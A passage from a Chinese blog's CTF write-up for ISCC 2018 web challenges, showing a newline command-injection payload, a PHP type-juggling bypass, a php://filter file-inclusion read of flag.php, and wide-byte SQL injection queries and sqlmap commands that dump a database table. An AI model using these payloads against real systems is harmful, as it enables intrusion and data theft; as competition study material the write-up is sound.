<p>发现它是可以执行命令的，那就是命令执行了，由于不能连续执行两个命令，于是在第一个命令的最后要输入一个%0a,然后输入第二个命令。（%0a的意思就是换行，带上它之后系统就可以连续执行两个命令）<br>这里直接给出payload：</p>
<pre><code>http://118.190.152.202:8018/?ip=127.0.0.1%0acd ..%0acd ..%0acd ..%0acd ..%0acat flag.php
</code></pre><p>由于flag不在当前目录下，因此我们要让目录往上边切换，做题的时候是每切换一次就要用ls命令试一试有没有我们需要的flag文件，最后测试在flag在/home目录下<br>有一个flag.php，这时候再用cat命令查看一下该文件的内容即可看到flag</p>
<pre><code>ISCC{8a8646c7a2fce16b166fbc68ca65f9e4}
</code></pre><h3 id="10-PLEASE-GIVE-ME-USERNAME-AND-PASSWORD"><a href="#10-PLEASE-GIVE-ME-USERNAME-AND-PASSWORD" class="headerlink" title="10.PLEASE GIVE ME USERNAME AND PASSWORD!"></a>10.PLEASE GIVE ME USERNAME AND PASSWORD!</h3><p>页面打开之后没有任何提示，查看源码也没有。不过既然提示了give me username and password ，那么GET给它一个username和password试一试，<br><img src="ISCC2018-wp/28.png" alt=""><br>返回的页面好像还是没什么软用，查看一下源代码发现了好东西，里面有一个index.php.txt文件，然后访问一下试试：</p>
<pre><code>http://118.190.152.202:8017/index.php.txt
</code></pre><p>得到了网页的源码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">$flag &#x3D; &quot;***********&quot;;	</span><br><span class="line">if(isset($_GET[&#39;username&#39;]))&#123;</span><br><span class="line">	if (0 &#x3D;&#x3D; strcasecmp($flag,$_GET[&#39;username&#39;]))&#123;</span><br><span class="line">	$a &#x3D; fla;</span><br><span class="line">	echo &quot;very good!Username is right&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">	else&#123;</span><br><span class="line">	print &#39;Username is not right&lt;!--index.php.txt--&gt;&#39;;&#125;</span><br><span class="line">&#125;else</span><br><span class="line">print &#39;Please give me username or password!&#39;;</span><br><span class="line">if (isset($_GET[&#39;password&#39;]))&#123;</span><br><span class="line">	if (is_numeric($_GET[&#39;password&#39;]))&#123;</span><br><span class="line">		if (strlen($_GET[&#39;password&#39;]) &lt; 4)&#123;</span><br><span class="line">			if ($_GET[&#39;password&#39;] &gt; 999)&#123;</span><br><span class="line">			$b &#x3D; g;</span><br><span class="line">			print &#39;&lt;p&gt;very good!Password is right&lt;&#x2F;p&gt;&#39;;</span><br><span class="line">		&#125;else </span><br><span class="line">			print &#39;&lt;p&gt;Password too little&lt;&#x2F;p&gt;&#39;;</span><br><span class="line">		&#125;else</span><br><span class="line">		print &#39;&lt;p&gt;Password too long&lt;&#x2F;p&gt;&#39;;</span><br><span class="line">	&#125;else</span><br><span class="line">	print &#39;&lt;p&gt;Password is not numeric&lt;&#x2F;p&gt;&#39;;</span><br><span class="line">&#125;</span><br><span class="line">if ($a.$b &#x3D;&#x3D; &quot;flag&quot;)</span><br><span class="line">	print $flag;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>代码审计可以分析出来username只需要传入成数组就可以返回成0.<br>而password有些麻烦，只能是三位但是还要大于999，表面看起来好像不可能啊，其实可以利用科学记数法，1e3就是10的三次方，占用3位数，其值为1000，刚好满足，这里给出payload：</p>
<pre><code>http://118.190.152.202:8017/index.php?username[]=&amp;password=1e3
</code></pre><p>得到flag：</p>
<pre><code>flag{ISCC2018_Very_GOOD!}
</code></pre><h3 id="11-试试看"><a href="#11-试试看" class="headerlink" title="11.试试看"></a>11.试试看</h3><p>打开后只有一个图片，查看源码有个链接，点进去还是那个图片，好像没什么软用，但是看到这个URL后恍然大悟，文件包含没什么好说的，利用伪协议查看文件源码，但是resource改了之后结果就没有了，无论怎么改都不行，迷茫之时大佬点醒了我，resource是可以用两个的，第一个resource不懂，第二个resource可以改成我们需要的，payload如下：<br>    view-source:<a href="http://118.190.152.202:8006/show.php?img=php://filter/read=convert.base64-encode/resource=1.jpg/resource=show.php" target="_blank" rel="noopener">http://118.190.152.202:8006/show.php?img=php://filter/read=convert.base64-encode/resource=1.jpg/resource=show.php</a></p>
<p>这是show.php的源码：<br><img src="ISCC2018-wp/29.png" alt=""></p>
<p>不过好像并没有什么软用，同样的方法也可以查看index.php 但是好像也没什么用</p>
<p>这里大胆猜测一下是否有一个flag.php的文件，发现并没有，那就试一试上一个目录下有没有该文件，直接查看../flag.php就可以，终于找到了flag.php文件，附上payload:<br>    <a href="http://118.190.152.202:8006/show.php?img=php://filter/read=convert.base64-encode/resource=1.jpg/resource=../flag.php" target="_blank" rel="noopener">http://118.190.152.202:8006/show.php?img=php://filter/read=convert.base64-encode/resource=1.jpg/resource=../flag.php</a></p>
<pre><code>flag{1ntere5ting_PHP_Regu1ar_express1onssssss}
</code></pre><h3 id="12-SQL注入的艺术"><a href="#12-SQL注入的艺术" class="headerlink" title="12.SQL注入的艺术"></a>12.SQL注入的艺术</h3><p>既然是SQL注入，那就各种注入都试试，<br>注入点在id上，最后试出来是宽字节注入，继续测试查询的字段，发现总共可以查询8个字段，这里给出最原始的注入语句：</p>
<pre><code>http://118.190.152.202:8015/index.php?id=-1%df&apos; select 1,2,3,4,5,6,7,8%23
</code></pre><p>接下来就是最简单的联合查询注入了，就不再多说，直接给出诸如语句：</p>
<pre><code>爆表名：http://118.190.152.202:8015/index.php?id=-1%df&apos; union select 1,(select table_name from information_schema.tables where table_schema=database()),3,version(),5,6,7,8 %23

爆字段名：http://118.190.152.202:8015/index.php?id=-1%df&apos; union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database()%23

爆flag：http://118.190.152.202:8015/index.php?id=-1%df&apos; union select 1,group_concat(flag),3,4,5,6,7,8 from baji.admins %23
</code></pre><p>当然这个题还有其他方法，用过sqlmap的童鞋应该都知道sqlmap是个注入工具，给它payload之后可以自己注入出结果，下面直接给出注入语句：</p>
<pre><code>爆数据库名：python2 sqlmap.py -u &quot;http://118.190.152.202:8015/index.php?id=1%df&apos;&quot; --dbs
</code></pre><p><img src="ISCC2018-wp/30.png" alt=""></p>
<pre><code>爆表名：python2 sqlmap.py -u &quot;http://118.190.152.202:8015/index.php?id=1%df&apos;&quot; -D baji --table
</code></pre><p><img src="ISCC2018-wp/31.png" alt=""></p>
<pre><code>爆字段名：python2 sqlmap.py -u &quot;http://118.190.152.202:8015/index.php?id=1%df&apos;&quot; -D baji -T admins --column
</code></pre><p><img src="ISCC2018-wp/32.png" alt=""></p>
<pre><code>爆flag：python2 sqlmap.py -u &quot;http://118.190.152.202:8015/index.php?id=1%df&apos;&quot; -D baji -T admins -C flag --dump
</code></pre><p><img src="ISCC2018-wp/33.png" alt=""></p>
<p>flag奉上：</p>
<pre><code>Y0u_@@33w_dxxmn_9rf0Od
</code></pre><h3 id="后续待更"><a href="#后续待更" class="headerlink" title="后续待更"></a>后续待更</h3>
      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2018/05/25/ISCC2018-wp/" data-id="ck4sb1gfh0000zkuy49571zoh" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/writeup/" rel="tag">writeup</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2018/07/11/vulhub%E6%8C%96%E6%B4%9E%E5%BF%83%E5%BE%97/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          vulhub挖洞心得
        
      </div>
    </a>
  
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CMS/" rel="tag">CMS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/docker/" rel="tag">docker</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/" rel="tag">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/writeup/" rel="tag">writeup</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%94%BB%E9%98%B2/" rel="tag">攻防</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CMS/" style="font-size: 20px;">CMS</a> <a href="/tags/CTF/" style="font-size: 15px;">CTF</a> <a href="/tags/docker/" style="font-size: 10px;">docker</a> <a href="/tags/php/" style="font-size: 10px;">php</a> <a href="/tags/writeup/" style="font-size: 10px;">writeup</a> <a href="/tags/%E6%94%BB%E9%98%B2/" style="font-size: 10px;">攻防</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/11/">November 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/10/">October 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/09/">September 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/07/">July 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/05/">May 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2018/11/15/PHP%E7%89%B9%E6%80%A7%E6%80%BB%E7%BB%93/">PHP特性总结</a>
          </li>
        
          <li>
            <a href="/2018/10/28/2018WEB%E5%AE%89%E5%85%A8%E6%B5%8B%E8%AF%95%E7%A7%8B%E5%AD%A3%E9%A2%84%E9%80%89%E8%B5%9B/">2018WEB安全测试秋季预选赛</a>
          </li>
        
          <li>
            <a href="/2018/10/19/%E6%B5%B7%E6%B4%8BCMS/">海洋CMS</a>
          </li>
        
          <li>
            <a href="/2018/10/05/docker%E5%BF%83%E5%BE%97/">docker心得</a>
          </li>
        
          <li>
            <a href="/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/">再见CMS--齐博CMS</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>